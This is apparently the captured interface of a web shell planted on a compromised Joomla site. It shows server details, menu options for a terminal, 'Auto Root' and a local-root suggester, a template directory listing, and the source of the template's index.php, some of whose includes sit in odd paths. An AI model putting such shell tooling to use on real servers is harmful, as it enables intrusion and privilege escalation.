Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
lusedi /
templates /
pixeldot /
Delete
Unzip
Name
Size
Permission
Date
Action
css
[ DIR ]
drwxr-xr-x
2017-10-08 15:42
html
[ DIR ]
drwxr-xr-x
2017-10-08 15:42
images
[ DIR ]
drwxr-xr-x
2017-10-08 16:35
modules
[ DIR ]
drwxr-xr-x
2017-10-08 15:42
slideshow
[ DIR ]
drwxr-xr-x
2017-10-08 15:42
HOW_TO_USE_THE_TEMPLATE.txt
871
B
-rw-r--r--
2017-10-08 15:42
LICENSE.txt
450
B
-rw-r--r--
2017-10-08 15:42
MODULE_POSITIONS.jpg
56.54
KB
-rw-r--r--
2017-10-08 15:42
favicon.ico
4.37
KB
-rw-r--r--
2017-10-08 17:31
functions.php
1.35
KB
-rw-r--r--
2017-10-08 15:42
index.php
4.57
KB
-rw-r--r--
2017-10-08 15:42
params.ini
0
B
-rw-r--r--
2017-10-08 15:42
templateDetails.xml
4.81
KB
-rw-r--r--
2017-10-08 15:42
template_thumbnail.jpg
19.89
KB
-rw-r--r--
2017-10-08 15:42
Save
Rename
<?php /** * @copyright 2012 - All Rights Reserved. **/?> <?php require(dirname(__FILE__)."/modules/req_parameters.php");?> <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"> <head> <?php require(dirname(__FILE__)."/functions.php");?> <?php require(dirname(__FILE__)."/modules/req_css.php");?> <script type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/html/com_content/archive/jscript.js"></script> <?php if ($this->params->get( 'jcopyright' )) : ?> <script type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/modules/jcopyright.js"></script><?php endif; ?> <script type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/modules/jload.js"></script> <?php if ($this->params->get( 'jscroll' )) : ?> <script type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/modules/jscroll.js"></script><?php endif; ?> </head> <body class="background"> <div id="main"> <div id="header-w"> <div id="header"> <a href="<?php echo $this->baseurl ?>/"><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/logo.png" border="0" class="logo"></a> <div class="topmenu"> <div id="navr"> <div id="nav"><jdoc:include type="modules" name="mainmenu" style="none" /></div> </div> </div> <div class="slogan"><?php if ($this->params->get( 'slogandisable' )) : ?><?php echo ($slogan); ?><?php endif; ?></div> <?php if ($this->countModules('top')) : ?> <div class="top"> <jdoc:include type="modules" name="top" style="none"/> </div> <?php endif; ?> </div> </div> <!-- Slideshow --> <div style="margin:0px auto; width: 980px;"> <?php if ($this->params->get( 'slidehome' )) : ?> <?php $app = JFactory::getApplication(); $menu = $app->getMenu(); $lang = JFactory::getLanguage(); if ($menu->getActive() == $menu->getDefault($lang->getTag())) : ?> <?php include "modules/slideshow.php"; ?> <?php endif; ?> <?php else : ?> <?php include "modules/slideshow.php"; ?> <?php endif; ?> </div> <!-- Slideshow --> <div id="wrapper"> <div id="main-content"> <?php $app = JFactory::getApplication();$menu = $app->getMenu();$lang = JFactory::getLanguage();if ($menu->getActive() == $menu->getDefault($lang->getTag())) : ?> <div id="toppositions"> <?php if ($this->countModules('top1')) : ?><div class="top1"><jdoc:include type="modules" name="top1" style="xhtml" /></div><?php endif; ?> <?php if ($this->countModules('top2')) : ?><div class="top2"><jdoc:include type="modules" name="top2" style="xhtml" /></div><?php endif; ?> </div> <?php endif; ?> <?php if($this->countModules('left') xor $this->countModules('right')) $maincol_sufix = '_md'; elseif(!$this->countModules('left') and !$this->countModules('right'))$maincol_sufix = '_bg'; else $maincol_sufix = '_md'; ?> <?php include "html/com_content/archive/function.php"; ?> <?php if($this->countModules('right') and JRequest::getCmd('layout') != 'form') : ?> <div id="rightbar-w"> <div id="sidebar"><jdoc:include type="modules" name="right" style="jaw" /></div> <?php if ($this->params->get( 'googletranslate' )) : ?> <?php include "modules/googletranslate.php"; ?><?php endif; ?> </div> <?php endif; ?> <div id="centercontent<?php echo $maincol_sufix; ?>"> <div class="clearpad"><jdoc:include type="component" /></div> <?php if ($this->countModules('breadcrumb')) : ?> <jdoc:include type="modules" name="breadcrumb" style="none"/> <?php endif; ?> </div> <div class="clr"></div> </div> </div><!--wrapper end---> <div id="bottomwide"> <div id="bottom"> <div class="user1"><jdoc:include type="modules" name="user1" style="xhtml" /></div> <div class="user2"><jdoc:include type="modules" name="user2" style="xhtml" /></div> <div class="user3"><jdoc:include type="modules" name="user3" style="xhtml" /></div> </div> <div style="display:none;" class="nav_up" id="nav_up"></div> <div class="tg"> <?php echo date('l \t\h\e jS');?>. <?php if ($this->params->get( 'footerdisable' )) : ?><?php echo ($footertext); ?><?php endif; ?> - <a href="http://www.freshjoomlatemplates.com/" target="_blank">Joomla Templates</a> </div> </div> </body> </html>